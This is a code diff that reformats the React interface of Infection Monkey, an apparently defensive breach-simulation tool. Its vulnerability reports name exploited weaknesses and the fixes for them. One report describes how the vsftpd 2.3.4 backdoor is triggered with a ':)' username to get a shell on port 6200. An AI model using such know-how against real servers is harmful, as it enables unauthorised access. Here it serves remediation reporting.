    - -
    -
    -
    ) +

    + ATT&CK report +

    +

    + This report shows information about ATT&CK techniques used by Infection Monkey. +

    +
    + +
    +
    +
    ) } generateReportFooter() { @@ -510,22 +518,22 @@ class ReportPageComponent extends AuthComponent { generateCrossSegmentIssue(crossSegmentIssue) { return
  • {'Communication possible from ' + crossSegmentIssue['source_subnet'] + ' to ' + crossSegmentIssue['target_subnet']} - -
      - {crossSegmentIssue['issues'].map(x => - x['is_self'] ? -
    • - {'Machine ' + x['hostname'] + ' has both ips: ' + x['source'] + ' and ' + x['target']} -
      • - : -
    • - {'IP ' + x['source'] + ' (' + x['hostname'] + ') connected to IP ' + x['target'] - + ' using the services: ' + Object.keys(x['services']).join(', ')} -
      • - )} -
    -     -
    • ; + +
      + {crossSegmentIssue['issues'].map(x => + x['is_self'] ? +
    • + {'Machine ' + x['hostname'] + ' has both ips: ' + x['source'] + ' and ' + x['target']} +
      • + : +
    • + {'IP ' + x['source'] + ' (' + x['hostname'] + ') connected to IP ' + x['target'] + + ' using the services: ' + Object.keys(x['services']).join(', ')} +
      • + )} +
    +     + ; } generateShellshockPathListBadges(paths) { @@ -619,18 +627,18 @@ class ReportPageComponent extends AuthComponent { generateSshKeysIssue(issue) { return ( -
  • - Protect {issue.ssh_key} private key with a pass phrase. - - The machine {issue.machine} ({issue.ip_address}) is vulnerable to a SSH attack. -
    - The Monkey authenticated over the SSH protocol with private key {issue.ssh_key}. -     -
    • - ); +
  • + Protect {issue.ssh_key} private key with a pass phrase. + + The machine {issue.machine} ({issue.ip_address}) is vulnerable to a SSH attack. +
    + The Monkey authenticated over the SSH protocol with private key {issue.ssh_key}. +     +
    • + ); } @@ -660,17 +668,20 @@ class ReportPageComponent extends AuthComponent { Update your VSFTPD server to the latest version vsftpd-3.0.3. The machine {issue.machine} ({issue.ip_address}) has a backdoor running at port {issue.ip_address}) has a backdoor running at port 6200.
    The attack was made possible because the VSFTPD server was not patched against CVE-2011-2523. -

    In July 2011, it was discovered that vsftpd version 2.3.4 downloadable from the master site had been compromised. - Users logging into a compromised vsftpd-2.3.4 server may issue a ":)" smileyface as the username and gain a command shell on port 6200. +

    In July 2011, it was discovered that vsftpd version 2.3.4 downloadable from the master site had been + compromised. + Users logging into a compromised vsftpd-2.3.4 server may issue a ":)" smileyface as the username and gain a command + shell on port 6200.

    - The Monkey executed commands by first logging in with ":)" in the username and then sending commands to the backdoor at port 6200. + The Monkey executed commands by first logging in with ":)" in the username and then sending commands to the backdoor + at port 6200.

    Read more about the security issue and remediation here. + href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2523" + >here.     ); @@ -716,8 +727,8 @@ class ReportPageComponent extends AuthComponent { Credentials could be stolen from {issue.machine} for the following users {issue.users}. Read more about the security issue and remediation here. + href="https://www.guardicore.com/2018/03/recovering-plaintext-passwords-azure/" + >here. ); @@ -756,11 +767,11 @@ class ReportPageComponent extends AuthComponent { generateSharedCredsDomainIssue(issue) { return ( -
  • +
  • Some domain users are sharing passwords, this should be fixed by changing passwords. These users are sharing access password: - {this.generateInfoBadges(issue.shared_with)}. + {this.generateInfoBadges(issue.shared_with)}.
    • ); @@ -768,11 +779,11 @@ class ReportPageComponent extends AuthComponent { generateSharedCredsIssue(issue) { return ( -
  • +
  • Some users are sharing passwords, this should be fixed by changing passwords. These users are sharing access password: - {this.generateInfoBadges(issue.shared_with)}. + {this.generateInfoBadges(issue.shared_with)}.
    • ); @@ -780,8 +791,9 @@ class ReportPageComponent extends AuthComponent { generateSharedLocalAdminsIssue(issue) { return ( -
  • - Make sure the right administrator accounts are managing the right machines, and that there isn’t an unintentional local admin sharing. +
  • + Make sure the right administrator accounts are managing the right machines, and that there isn’t an unintentional local + admin sharing. Here is a list of machines which the account {issue.username} is defined as an administrator: @@ -793,13 +805,13 @@ class ReportPageComponent extends AuthComponent { generateStrongUsersOnCritIssue(issue) { return ( -
  • +
  • This critical machine is open to attacks via strong users with access to it. The services: {this.generateInfoBadges(issue.services)} have been found on the machine thus classifying it as a critical machine. These users has access to it: - {this.generateInfoBadges(issue.threatening_users)}. + {this.generateInfoBadges(issue.threatening_users)}.
    • ); @@ -829,8 +841,8 @@ class ReportPageComponent extends AuthComponent {
    The attack was made possible because the server is using an old version of Jakarta based file upload Multipart parser. For possible work-arounds and more info read here. + href="https://cwiki.apache.org/confluence/display/WW/S2-045" + >here. ); @@ -856,7 +868,8 @@ class ReportPageComponent extends AuthComponent { generateHadoopIssue(issue) { return (
  • - Run Hadoop in secure mode ( + Run Hadoop in secure mode ( add Kerberos authentication). The Hadoop server at {issue.machine} ( Disable the xp_cmdshell option. @@ -880,8 +893,8 @@ generateMSSQLIssue(issue) {
    The attack was made possible because the target machine used an outdated MSSQL server configuration allowing the usage of the xp_cmdshell command. To learn more about how to disable this feature, read - Microsoft's documentation. + href="https://docs.microsoft.com/en-us/sql/database-engine/configure-windows/xp-cmdshell-server-configuration-option?view=sql-server-2017"> + Microsoft's documentation.
    • ); diff --git a/monkey/monkey_island/cc/ui/src/components/pages/RunMonkeyPage.js b/monkey/monkey_island/cc/ui/src/components/pages/RunMonkeyPage.js index 1008199fc..57373b2f7 100644 --- a/monkey/monkey_island/cc/ui/src/components/pages/RunMonkeyPage.js +++ b/monkey/monkey_island/cc/ui/src/components/pages/RunMonkeyPage.js @@ -1,5 +1,5 @@ import React from 'react'; -import { css } from '@emotion/core'; +import {css} from '@emotion/core'; import {Button, Col, Well, Nav, NavItem, Collapse} from 'react-bootstrap'; import CopyToClipboard from 'react-copy-to-clipboard'; import GridLoader from 'react-spinners/GridLoader'; @@ -35,7 +35,7 @@ class RunMonkeyPageComponent extends AuthComponent { isLoadingAws: true, isErrorWhileCollectingAwsMachines: false, awsMachineCollectionErrorMsg: '' - }; + }; } componentDidMount() { @@ -48,7 +48,7 @@ class RunMonkeyPageComponent extends AuthComponent { this.authFetch('/api/local-monkey') .then(res => res.json()) - .then(res =>{ + .then(res => { if (res['is_running']) { this.setState({runningOnIslandState: 'running'}); } else { @@ -75,7 +75,7 @@ class RunMonkeyPageComponent extends AuthComponent { fetchAwsInfo() { return this.authFetch('/api/remote-monkey?action=list_aws') .then(res => res.json()) - .then(res =>{ + .then(res => { let is_aws = res['is_aws']; if (is_aws) { // On AWS! @@ -83,7 +83,12 @@ class RunMonkeyPageComponent extends AuthComponent { let is_error_while_collecting_aws_machines = (res['error'] != null); if (is_error_while_collecting_aws_machines) { // There was an error. Finish loading, and display error message. - this.setState({isOnAws: true, isErrorWhileCollectingAwsMachines: true, awsMachineCollectionErrorMsg: res['error'], isLoadingAws: false}); + this.setState({ + isOnAws: true, + isErrorWhileCollectingAwsMachines: true, + awsMachineCollectionErrorMsg: res['error'], + isLoadingAws: false + }); } else { // No error! Finish loading and display machines for user this.setState({isOnAws: true, awsMachines: res['instances'], isLoadingAws: false}); @@ -138,7 +143,7 @@ class RunMonkeyPageComponent extends AuthComponent { cmdText = RunMonkeyPageComponent.generateWindowsCmd(this.state.selectedIp, is32Bit); } return ( - +
    ) } + render() { return ( @@ -281,9 +291,9 @@ class RunMonkeyPageComponent extends AuthComponent { { // TODO: implement button functionality @@ -302,7 +312,8 @@ class RunMonkeyPageComponent extends AuthComponent { OR

    -

    @@ -323,7 +334,7 @@ class RunMonkeyPageComponent extends AuthComponent { style={{'marginBottom': '2em'}}> {this.state.ips.map(ip => {ip})} - :
    + :
    }

    Copy the following command to your machine and run it with Administrator or root privileges. @@ -344,7 +355,7 @@ class RunMonkeyPageComponent extends AuthComponent { />

    - : null + : null } { this.state.isOnAws ? @@ -357,7 +368,8 @@ class RunMonkeyPageComponent extends AuthComponent { { this.state.isOnAws ?

    -

    @@ -370,9 +382,12 @@ class RunMonkeyPageComponent extends AuthComponent {

    - Error while collecting AWS machine data. Error message: {this.state.awsMachineCollectionErrorMsg}
    + Error while collecting AWS machine data. Error + message: {this.state.awsMachineCollectionErrorMsg}
    Are you sure you've set the correct role on your Island AWS machine?
    - Not sure what this is? Read the documentation! + Not sure what this is? Read + the documentation!

    : diff --git a/monkey/monkey_island/cc/ui/src/components/pages/StartOverPage.js b/monkey/monkey_island/cc/ui/src/components/pages/StartOverPage.js index c44a5a72f..eca159133 100644 --- a/monkey/monkey_island/cc/ui/src/components/pages/StartOverPage.js +++ b/monkey/monkey_island/cc/ui/src/components/pages/StartOverPage.js @@ -29,7 +29,9 @@ class StartOverPageComponent extends AuthComponent { return ( this.setState({showCleanDialog: false})}> -

    Reset environment

    +

    +
    Reset environment
    +

    Are you sure you want to reset the environment?

    @@ -40,7 +42,7 @@ class StartOverPageComponent extends AuthComponent { Some monkeys are still running. It's advised to kill all monkeys before resetting.
    : -
    +
    }
    @@ -86,7 +89,7 @@ class StartOverPageComponent extends AuthComponent { You can continue and Run More Monkeys as you wish, and see the results on the Infection Map without deleting anything.
    - { this.state.cleaned ? + {this.state.cleaned ?
    Environment was reset successfully @@ -106,8 +109,8 @@ class StartOverPageComponent extends AuthComponent { .then(res => { if (res['status'] === 'OK') { this.setState({ - cleaned: true - }); + cleaned: true + }); } }); } diff --git a/monkey/monkey_island/cc/ui/src/components/pages/TelemetryPage.js b/monkey/monkey_island/cc/ui/src/components/pages/TelemetryPage.js index 120344eea..27fb50cd0 100644 --- a/monkey/monkey_island/cc/ui/src/components/pages/TelemetryPage.js +++ b/monkey/monkey_island/cc/ui/src/components/pages/TelemetryPage.js @@ -5,14 +5,14 @@ import {DataTable} from 'react-data-components'; import AuthComponent from '../AuthComponent'; import download from 'downloadjs' -const renderJson = (val) => ; +const renderJson = (val) => ; const renderTime = (val) => val.split('.')[0]; const columns = [ - { title: 'Time', prop: 'timestamp', render: renderTime}, - { title: 'Monkey', prop: 'monkey'}, - { title: 'Type', prop: 'telem_catagory'}, - { title: 'Details', prop: 'data', render: renderJson, width: '40%' } + {title: 'Time', prop: 'timestamp', render: renderTime}, + {title: 'Monkey', prop: 'monkey'}, + {title: 'Type', prop: 'telem_catagory'}, + {title: 'Details', prop: 'data', render: renderJson, width: '40%'} ]; class TelemetryPageComponent extends AuthComponent { @@ -29,7 +29,7 @@ class TelemetryPageComponent extends AuthComponent { .then(res => this.setState({data: res.objects})); }; -downloadIslandLog = () => { + downloadIslandLog = () => { this.authFetch('/api/log/island/download') .then(res => res.json()) .then(res => { @@ -37,39 +37,39 @@ downloadIslandLog = () => { let logContent = (res['log_file']); download(logContent, filename, 'text/plain'); }); - }; + }; render() { return ( -
    - -

    Log

    -
    - -
    - -
    -
    - -

    Monkey Island Logs

    -
    -

    Download Monkey Island internal log file

    - -
    - + Download +
    + +
    -
    ); } } diff --git a/monkey/monkey_island/cc/ui/src/components/report-components/common/PaginatedTable.js b/monkey/monkey_island/cc/ui/src/components/report-components/common/PaginatedTable.js index 5bc6183fd..c5300f657 100644 --- a/monkey/monkey_island/cc/ui/src/components/report-components/common/PaginatedTable.js +++ b/monkey/monkey_island/cc/ui/src/components/report-components/common/PaginatedTable.js @@ -18,8 +18,7 @@ class PaginatedTable extends Component { />
    ); - } - else { + } else { return (
    ); diff --git a/monkey/monkey_island/cc/ui/src/components/report-components/security/AttackReport.js b/monkey/monkey_island/cc/ui/src/components/report-components/security/AttackReport.js index 13f9cd92e..92dac6cff 100644 --- a/monkey/monkey_island/cc/ui/src/components/report-components/security/AttackReport.js +++ b/monkey/monkey_island/cc/ui/src/components/report-components/security/AttackReport.js @@ -100,9 +100,9 @@ class AttackReportPageComponent extends AuthComponent { } onToggle = technique => - this.setState(state => ({ collapseOpen: state.collapseOpen === technique ? null : technique })); + this.setState(state => ({collapseOpen: state.collapseOpen === technique ? null : technique})); - getComponentClass(tech_id){ + getComponentClass(tech_id) { switch (this.state.report[tech_id].status) { case ScanStatus.SCANNED: return 'collapse-info'; @@ -113,9 +113,9 @@ class AttackReportPageComponent extends AuthComponent { } } - getTechniqueCollapse(tech_id){ + getTechniqueCollapse(tech_id) { return ( -
    +
    @@ -146,23 +146,23 @@ class AttackReportPageComponent extends AuthComponent { } renderLegend() { - return( ) + return () } - generateReportContent(){ + generateReportContent() { let content = []; Object.keys(this.state.report).forEach((tech_id) => { content.push(this.getTechniqueCollapse(tech_id)) @@ -177,15 +177,14 @@ class AttackReportPageComponent extends AuthComponent { render() { let content; - if (! this.state.runStarted) - { + if (!this.state.runStarted) { content =

    You have to run a monkey before generating a report!

    ; - } else if (this.state.report === false){ - content = (

    Generating Report...

    ); + } else if (this.state.report === false) { + content = (

    Generating Report...

    ); } else if (Object.keys(this.state.report).length === 0) { if (this.state.runStarted) { content = (

    No techniques were scanned

    ); @@ -193,7 +192,7 @@ class AttackReportPageComponent extends AuthComponent { } else { content = this.generateReportContent(); } - return (
    {content}
    ); + return (
    {content}
    ); } } diff --git a/monkey/monkey_island/cc/ui/src/components/report-components/security/BreachedServers.js b/monkey/monkey_island/cc/ui/src/components/report-components/security/BreachedServers.js index 16f445ce9..b1dc64f62 100644 --- a/monkey/monkey_island/cc/ui/src/components/report-components/security/BreachedServers.js +++ b/monkey/monkey_island/cc/ui/src/components/report-components/security/BreachedServers.js @@ -1,7 +1,7 @@ import React from 'react'; import ReactTable from 'react-table' -let renderArray = function(val) { +let renderArray = function (val) { return
    {val.map(x =>
    {x}
    )}
    ; }; @@ -14,10 +14,12 @@ const columns = [ Header: 'Breached Servers', columns: [ {Header: 'Machine', accessor: 'label'}, - {Header: 'IP Addresses', id: 'ip_addresses', - accessor: x => renderIpAddresses(x)}, + { + Header: 'IP Addresses', id: 'ip_addresses', + accessor: x => renderIpAddresses(x) + }, {Header: 'Exploits', id: 'exploits', accessor: x => renderArray(x.exploits)} - ] + ] } ]; diff --git a/monkey/monkey_island/cc/ui/src/components/report-components/security/PostBreach.js b/monkey/monkey_island/cc/ui/src/components/report-components/security/PostBreach.js index ea39e3c45..ebbc473f8 100644 --- a/monkey/monkey_island/cc/ui/src/components/report-components/security/PostBreach.js +++ b/monkey/monkey_island/cc/ui/src/components/report-components/security/PostBreach.js @@ -1,7 +1,7 @@ import React from 'react'; import ReactTable from 'react-table' -let renderArray = function(val) { +let renderArray = function (val) { return {val.map(x => {x})}; }; @@ -15,36 +15,36 @@ let renderMachine = function (data) { let renderPbaResults = function (results) { let pbaClass = ""; - if (results[1]){ - pbaClass="pba-success" + if (results[1]) { + pbaClass = "pba-success" } else { - pbaClass="pba-danger" + pbaClass = "pba-danger" } return
    {results[0]}
    }; const subColumns = [ - {id: 'pba_name', Header: "Name", accessor: x => x.name, style: { 'whiteSpace': 'unset' }, width: 160}, - {id: 'pba_output', Header: "Output", accessor: x => renderPbaResults(x.result), style: { 'whiteSpace': 'unset' }} + {id: 'pba_name', Header: "Name", accessor: x => x.name, style: {'whiteSpace': 'unset'}, width: 160}, + {id: 'pba_output', Header: "Output", accessor: x => renderPbaResults(x.result), style: {'whiteSpace': 'unset'}} ]; let renderDetails = function (data) { let defaultPageSize = data.length > pageSize ? pageSize : data.length; let showPagination = data.length > pageSize; return + data={data} + columns={subColumns} + defaultPageSize={defaultPageSize} + showPagination={showPagination} + style={{"backgroundColor": "#ededed"}} + /> }; const columns = [ { Header: 'Post breach actions', columns: [ - {id: 'pba_machine', Header:'Machine', accessor: x => renderMachine(x)} + {id: 'pba_machine', Header: 'Machine', accessor: x => renderMachine(x)} ] } ]; @@ -57,8 +57,8 @@ class PostBreachComponent extends React.Component { } render() { - let pbaMachines = this.props.data.filter(function(value, index, arr){ - return ( value.pba_results !== "None" && value.pba_results.length > 0); + let pbaMachines = this.props.data.filter(function (value, index, arr) { + return (value.pba_results !== "None" && value.pba_results.length > 0); }); let defaultPageSize = pbaMachines.length > pageSize ? pageSize : pbaMachines.length; let showPagination = pbaMachines > pageSize; diff --git a/monkey/monkey_island/cc/ui/src/components/report-components/security/ScannedServers.js b/monkey/monkey_island/cc/ui/src/components/report-components/security/ScannedServers.js index 57418e415..585e6af37 100644 --- a/monkey/monkey_island/cc/ui/src/components/report-components/security/ScannedServers.js +++ b/monkey/monkey_island/cc/ui/src/components/report-components/security/ScannedServers.js @@ -1,7 +1,7 @@ import React from 'react'; import ReactTable from 'react-table' -let renderArray = function(val) { +let renderArray = function (val) { return
    {val.map(x =>
    {x}
    )}
    ; }; @@ -13,11 +13,13 @@ const columns = [ { Header: 'Scanned Servers', columns: [ - { Header: 'Machine', accessor: 'label'}, - { Header: 'IP Addresses', id: 'ip_addresses', - accessor: x => renderIpAddresses(x)}, - { Header: 'Accessible From', id: 'accessible_from_nodes', accessor: x => renderArray(x.accessible_from_nodes)}, - { Header: 'Services', id: 'services', accessor: x => renderArray(x.services)} + {Header: 'Machine', accessor: 'label'}, + { + Header: 'IP Addresses', id: 'ip_addresses', + accessor: x => renderIpAddresses(x) + }, + {Header: 'Accessible From', id: 'accessible_from_nodes', accessor: x => renderArray(x.accessible_from_nodes)}, + {Header: 'Services', id: 'services', accessor: x => renderArray(x.services)} ] } ]; diff --git a/monkey/monkey_island/cc/ui/src/components/report-components/security/StolenPasswords.js b/monkey/monkey_island/cc/ui/src/components/report-components/security/StolenPasswords.js index fde46f85a..25a701871 100644 --- a/monkey/monkey_island/cc/ui/src/components/report-components/security/StolenPasswords.js +++ b/monkey/monkey_island/cc/ui/src/components/report-components/security/StolenPasswords.js @@ -5,9 +5,9 @@ const columns = [ { Header: 'Stolen Credentials', columns: [ - { Header: 'Username', accessor: 'username'}, - { Header: 'Type', accessor: 'type'}, - { Header: 'Stolen From', accessor: 'origin'} + {Header: 'Username', accessor: 'username'}, + {Header: 'Type', accessor: 'type'}, + {Header: 'Stolen From', accessor: 'origin'} ] } ]; diff --git a/monkey/monkey_island/cc/ui/src/components/report-components/security/StrongUsers.js b/monkey/monkey_island/cc/ui/src/components/report-components/security/StrongUsers.js index a8f045479..2c2a79c07 100644 --- a/monkey/monkey_island/cc/ui/src/components/report-components/security/StrongUsers.js +++ b/monkey/monkey_island/cc/ui/src/components/report-components/security/StrongUsers.js @@ -1,7 +1,7 @@ import React from 'react'; import ReactTable from 'react-table' -let renderArray = function(val) { +let renderArray = function (val) { console.log(val); return
    {val.map(x =>
    {x}
    )}
    ; }; @@ -10,9 +10,9 @@ const columns = [ { Header: 'Powerful Users', columns: [ - { Header: 'Username', accessor: 'username'}, - { Header: 'Machines', id: 'machines', accessor: x => renderArray(x.machines)}, - { Header: 'Services', id: 'services', accessor: x => renderArray(x.services_names)} + {Header: 'Username', accessor: 'username'}, + {Header: 'Machines', id: 'machines', accessor: x => renderArray(x.machines)}, + {Header: 'Services', id: 'services', accessor: x => renderArray(x.services_names)} ] } ]; diff --git a/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/EventsButton.js b/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/EventsButton.js index 761ff94a9..49905531c 100644 --- a/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/EventsButton.js +++ b/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/EventsButton.js @@ -21,13 +21,13 @@ export default class EventsButton extends Component { render() { return - -
    - -
    + +
    + +
    ; } diff --git a/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/EventsModal.js b/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/EventsModal.js index a7f2fe41c..2f56c7a76 100644 --- a/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/EventsModal.js +++ b/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/EventsModal.js @@ -20,9 +20,11 @@ export default class EventsModal extends Component {

    Events

    -
    +

    - There {Pluralize('is', this.props.events.length)} {

    {this.props.events.length}
    } {Pluralize('event', this.props.events.length)} associated with this finding. + There {Pluralize('is', this.props.events.length)} {
    {this.props.events.length}
    } {Pluralize('event', this.props.events.length)} associated + with this finding.

    {this.props.events.length > 5 ? this.renderButtons() : null} diff --git a/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/EventsTimeline.js b/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/EventsTimeline.js index b7fb90811..e124b6659 100644 --- a/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/EventsTimeline.js +++ b/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/EventsTimeline.js @@ -22,8 +22,8 @@ export default class EventsTimeline extends Component { key={index} createdAt={event_time} title={event.title} - icon={icon}> - {event.message} + icon={icon}> + {event.message} ) }) } diff --git a/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/PillarLabel.js b/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/PillarLabel.js index 51c5ca380..2eb839504 100644 --- a/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/PillarLabel.js +++ b/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/PillarLabel.js @@ -15,7 +15,8 @@ const pillarToIcon = { export default class PillarLabel extends Component { render() { const className = "label " + statusToLabelType[this.props.status]; - return
    {this.props.pillar}
    + return
    {this.props.pillar}
    } } diff --git a/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/PrinciplesStatusTable.js b/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/PrinciplesStatusTable.js index b50ee0c28..6db2dfad3 100644 --- a/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/PrinciplesStatusTable.js +++ b/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/PrinciplesStatusTable.js @@ -10,19 +10,22 @@ const MAX_WIDTH_STATUS_COLUMN = 80; const columns = [ { columns: [ - { Header: 'Status', id: 'status', + { + Header: 'Status', id: 'status', accessor: x => { - return ; + return ; }, maxWidth: MAX_WIDTH_STATUS_COLUMN }, - { Header: 'Zero Trust Principle', accessor: 'principle', + { + Header: 'Zero Trust Principle', accessor: 'principle', style: {'whiteSpace': 'unset'} // This enables word wrap }, - { Header: 'Monkey Tests', id: 'tests', + { + Header: 'Monkey Tests', id: 'tests', style: {'whiteSpace': 'unset'}, // This enables word wrap accessor: x => { - return ; + return ; } } ] diff --git a/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/ReportLegend.js b/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/ReportLegend.js index 5ef75f2b4..0820fe3a6 100644 --- a/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/ReportLegend.js +++ b/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/ReportLegend.js @@ -13,7 +13,7 @@ class ZeroTrustReportLegend extends Component { -

    Legend

    +

    Legend

         @@ -32,7 +32,8 @@ class ZeroTrustReportLegend extends Component {
    - {"\t"}At least one of the tests related to this component failed. This means that the Infection Monkey detected an unmet Zero Trust requirement. + {"\t"}At least one of the tests related to this component failed. This means that the Infection Monkey detected an + unmet Zero Trust requirement.
  • @@ -50,7 +51,8 @@ class ZeroTrustReportLegend extends Component {
    - {"\t"}This status means the test wasn't executed.To activate more tests, refer to the Monkey configuration page. + {"\t"}This status means the test wasn't executed.To activate more tests, refer to the Monkey configuration page.
    • ; diff --git a/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/SinglePillarPrinciplesStatus.js b/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/SinglePillarPrinciplesStatus.js index 8e4512ac7..8de7a4d21 100644 --- a/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/SinglePillarPrinciplesStatus.js +++ b/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/SinglePillarPrinciplesStatus.js @@ -9,14 +9,14 @@ export default class SinglePillarPrinciplesStatus extends AuthComponent { render() { if (this.props.principlesStatus.length === 0) { return null; - } - else { + } else { return (

    - +

    diff --git a/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/StatusesToPillarsSummary.js b/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/StatusesToPillarsSummary.js index d34a484b9..0002ba9e0 100644 --- a/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/StatusesToPillarsSummary.js +++ b/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/StatusesToPillarsSummary.js @@ -21,11 +21,11 @@ export default class StatusesToPillarsSummary extends Component {
    - { - this.props.statusesToPillars[status].map((pillar) => { - return - }) - } + { + this.props.statusesToPillars[status].map((pillar) => { + return + }) + }
    } diff --git a/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/SummarySection.js b/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/SummarySection.js index e4012bf50..0f937f341 100644 --- a/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/SummarySection.js +++ b/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/SummarySection.js @@ -14,9 +14,10 @@ export default class SummarySection extends Component {

    - Get a quick glance at how your network aligns with the - Zero Trust eXtended (ZTX) framework - . + Get a quick glance at how your network aligns with the + Zero Trust eXtended (ZTX) framework + .

    diff --git a/monkey/monkey_island/cc/ui/src/components/run-monkey/AwsRunTable.js b/monkey/monkey_island/cc/ui/src/components/run-monkey/AwsRunTable.js index 6a8fe9416..f2815a142 100644 --- a/monkey/monkey_island/cc/ui/src/components/run-monkey/AwsRunTable.js +++ b/monkey/monkey_island/cc/ui/src/components/run-monkey/AwsRunTable.js @@ -8,10 +8,10 @@ const columns = [ { Header: 'Machines', columns: [ - { Header: 'Machine', accessor: 'name'}, - { Header: 'Instance ID', accessor: 'instance_id'}, - { Header: 'IP Address', accessor: 'ip_address'}, - { Header: 'OS', accessor: 'os'} + {Header: 'Machine', accessor: 'name'}, + {Header: 'Instance ID', accessor: 'instance_id'}, + {Header: 'IP Address', accessor: 'ip_address'}, + {Header: 'OS', accessor: 'os'} ] } ]; @@ -44,7 +44,7 @@ class AwsRunTableComponent extends React.Component { selection.push(key); } // update the state - this.setState({ selection }); + this.setState({selection}); }; isSelected = key => { @@ -64,7 +64,7 @@ class AwsRunTableComponent extends React.Component { selection.push(item._original.instance_id); }); } - this.setState({ selectAll, selection }); + this.setState({selectAll, selection}); }; getTrProps = (s, r) => { diff --git a/monkey/monkey_island/cc/ui/src/components/ui-components/Checkbox.js b/monkey/monkey_island/cc/ui/src/components/ui-components/Checkbox.js index 74204973a..f200a6fdb 100644 --- a/monkey/monkey_island/cc/ui/src/components/ui-components/Checkbox.js +++ b/monkey/monkey_island/cc/ui/src/components/ui-components/Checkbox.js @@ -15,59 +15,68 @@ class CheckboxComponent extends React.PureComponent { this.props.name (the name of this component) and this.state.checked (boolean indicating if this component is checked or not) */ - constructor(props) { - super(props); - this.state = { - checked: this.props.checked, + constructor(props) { + super(props); + this.state = { + checked: this.props.checked, necessary: this.props.necessary, - isAnimating: false - }; - this.toggleChecked = this.toggleChecked.bind(this); - this.stopAnimation = this.stopAnimation.bind(this); - this.composeStateClasses = this.composeStateClasses.bind(this); - } + isAnimating: false + }; + this.toggleChecked = this.toggleChecked.bind(this); + this.stopAnimation = this.stopAnimation.bind(this); + this.composeStateClasses = this.composeStateClasses.bind(this); + } - //Toggles component. - toggleChecked() { - if (this.state.isAnimating) {return false;} - this.setState({ - checked: !this.state.checked, - isAnimating: true, - }, () => { this.props.changeHandler ? this.props.changeHandler(this.props.name, this.state.checked) : null}); - } + //Toggles component. + toggleChecked() { + if (this.state.isAnimating) { + return false; + } + this.setState({ + checked: !this.state.checked, + isAnimating: true, + }, () => { + this.props.changeHandler ? this.props.changeHandler(this.props.name, this.state.checked) : null + }); + } - // Stops ping animation on checkbox after click - stopAnimation() { - this.setState({ isAnimating: false }) - } + // Stops ping animation on checkbox after click + stopAnimation() { + this.setState({isAnimating: false}) + } - // Creates class string for component - composeStateClasses(core) { - let result = core; - if (this.state.necessary){ + // Creates class string for component + composeStateClasses(core) { + let result = core; + if (this.state.necessary) { return result + ' blocked' } - if (this.state.checked) { result += ' is-checked'; } - else { result += ' is-unchecked' } + if (this.state.checked) { + result += ' is-checked'; + } else { + result += ' is-unchecked' + } - if (this.state.isAnimating) { result += ' do-ping'; } - return result; - } + if (this.state.isAnimating) { + result += ' do-ping'; + } + return result; + } - render() { - const cl = this.composeStateClasses('ui-checkbox-btn'); - return ( -
    - - -
    -
    - ) - } + render() { + const cl = this.composeStateClasses('ui-checkbox-btn'); + return ( +
    + + +
    +
    + ) + } } export default CheckboxComponent; diff --git a/monkey/monkey_island/cc/ui/src/config/base.js b/monkey/monkey_island/cc/ui/src/config/base.js index 65b6aff99..bea121a3c 100644 --- a/monkey/monkey_island/cc/ui/src/config/base.js +++ b/monkey/monkey_island/cc/ui/src/config/base.js @@ -1,5 +1,4 @@ 'use strict'; // Settings configured here will be merged into the final config object. -export default { -} +export default {} diff --git a/monkey/monkey_island/cc/ui/src/images/infection-monkey.svg b/monkey/monkey_island/cc/ui/src/images/infection-monkey.svg index 3a357890d..ee2d9cda0 100644 --- a/monkey/monkey_island/cc/ui/src/images/infection-monkey.svg +++ b/monkey/monkey_island/cc/ui/src/images/infection-monkey.svg @@ -2,30 +2,45 @@ 14cbedff-3eed-4f8f-abb7-fffe92867ded - - - - - - + + + + + + - - - - - - - - + + + + + + + + - + diff --git a/monkey/monkey_island/cc/ui/src/images/monkey-icon.svg b/monkey/monkey_island/cc/ui/src/images/monkey-icon.svg index 837610f28..5e91edec1 100644 --- a/monkey/monkey_island/cc/ui/src/images/monkey-icon.svg +++ b/monkey/monkey_island/cc/ui/src/images/monkey-icon.svg @@ -2,7 +2,7 @@ @@ -10,8 +10,11 @@ - - - + + + diff --git a/monkey/monkey_island/cc/ui/src/images/zerotrust/im-alert-machine-icon.svg b/monkey/monkey_island/cc/ui/src/images/zerotrust/im-alert-machine-icon.svg index 507541be4..341223590 100644 --- a/monkey/monkey_island/cc/ui/src/images/zerotrust/im-alert-machine-icon.svg +++ b/monkey/monkey_island/cc/ui/src/images/zerotrust/im-alert-machine-icon.svg @@ -1 +1,13 @@ -im-alert-machine-icon \ No newline at end of file + + im-alert-machine-icon + + + + + + + + + + diff 